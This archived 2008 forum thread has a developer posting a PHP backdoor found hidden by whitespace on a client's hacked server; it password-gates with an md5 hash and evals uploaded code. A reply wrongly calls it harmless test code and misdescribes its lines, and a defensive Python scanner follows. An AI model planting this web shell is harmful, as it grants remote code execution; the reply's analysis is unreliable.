rhouk Posted May 13, 2008

It appears my client's web site files have been hacked. I've started finding odd php files on their server, with no explanation as to how they got there. When I open these files they appear blank until I scroll down and to the center, where I find the following script. Can anyone tell me what this script is doing?

```php
<?php
error_reporting(1);
global $HTTP_SERVER_VARS;
function say($t) { echo "$t\n"; };
function testdata($t) { say(md5("testdata_$t")); };
echo "<pre>";
testdata('start');
if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){
    if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){
        eval($code);
    }else{
        testdata('f');
    };
}else{
    testdata('pass');
};
testdata('end');
echo "</pre>";
?>
```

I know this won't fix the issue, but understanding what they are doing might help. Thanks!!!!
benphp Posted May 13, 2008

It doesn't seem to be doing anything malicious - looks like it's reading a file that contains PHP. Someone submits a form with "p" = the encrypted string, and it runs two functions to read and display code within a selected file. It does actually look like a test script. Maybe someone was troubleshooting your site?

```php
<?php
error_reporting(1);
global $HTTP_SERVER_VARS;
function say($t) { //function prints whatever is fed to it
    echo "$t\n";
};
function testdata($t) { //function that encrypts a string and prints it using the say function
    say(md5("testdata_$t"));
};
echo "<pre>";
testdata('start'); //sends the string 'start' to the say testdata function
if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ //reads a form value "p" to see if it matches an encrypted value - a password?
    if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){ //opens a file and reads it "rb"
        eval($code); //reads the code within the file
    } else {
        testdata('f'); //prints it out
    };
}else{
    testdata('pass'); //or it fails
};
testdata('end');
echo "</pre>";
?>
```
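As an added example (not code from the thread or its posters), a small Python scanner for the traits visible in the posted file: code pushed off-screen by leading whitespace, an `eval` alongside an uploaded-file read, and a request parameter compared against a hard-coded MD5 digest. The threshold, the indicator names and the sample strings are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# Heuristics modelled on the file posted in this thread (assumed, not exhaustive).
EVAL_RE = re.compile(r"\beval\s*\(", re.I)
UPLOAD_RE = re.compile(r"\$_FILES|\$HTTP_POST_FILES")
# md5($_POST["x"]) == "<32 hex chars>": a password gate with a hard-coded digest.
HASH_GATE_RE = re.compile(
    r"md5\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\s*\[[^\]]*\]\s*\)"
    r"\s*={2,3}\s*[\"'][0-9a-f]{32}[\"']", re.I)
PAD_THRESHOLD = 200  # assumed: whitespace chars before "<?" that hide the code

def score_php(text):
    """Return the names of the indicators that fire for one file's contents."""
    hits = []
    start = text.find("<?")
    # The file "appears blank" because only whitespace precedes the open tag.
    if start >= PAD_THRESHOLD and text[:start].strip() == "":
        hits.append("whitespace-padding")
    # Co-occurrence only: eval() in a file that also touches uploaded files.
    if EVAL_RE.search(text) and UPLOAD_RE.search(text):
        hits.append("eval-of-upload")
    if HASH_GATE_RE.search(text):
        hits.append("hardcoded-md5-gate")
    return hits

def scan_tree(root, min_hits=2):
    """Return [(path, indicators)] for .php files with at least min_hits indicators."""
    found = []
    for path in sorted(Path(root).rglob("*.php")):
        hits = score_php(path.read_text(errors="replace"))
        if len(hits) >= min_hits:
            found.append((str(path), hits))
    return found

# Constructed samples: same shape as the posted file, with a placeholder digest.
SAMPLE = ("\n" * 150 + " " * 120
          + '<?php if (md5($_POST["p"])=="' + "0" * 32 + '"){ '
          + 'eval(@fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),'
          + '$HTTP_POST_FILES["f"]["size"])); } ?>')
BENIGN = ('<?php echo md5($_POST["p"]); '
          'move_uploaded_file($_FILES["f"]["tmp_name"], "/tmp/x"); ?>')

if __name__ == "__main__":
    print(score_php(SAMPLE))
    print(score_php(BENIGN))
```

Run `scan_tree` over the web root and review every hit by hand; a match is a reason to inspect the file, not proof of compromise.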
This topic is now archived and is closed to further replies.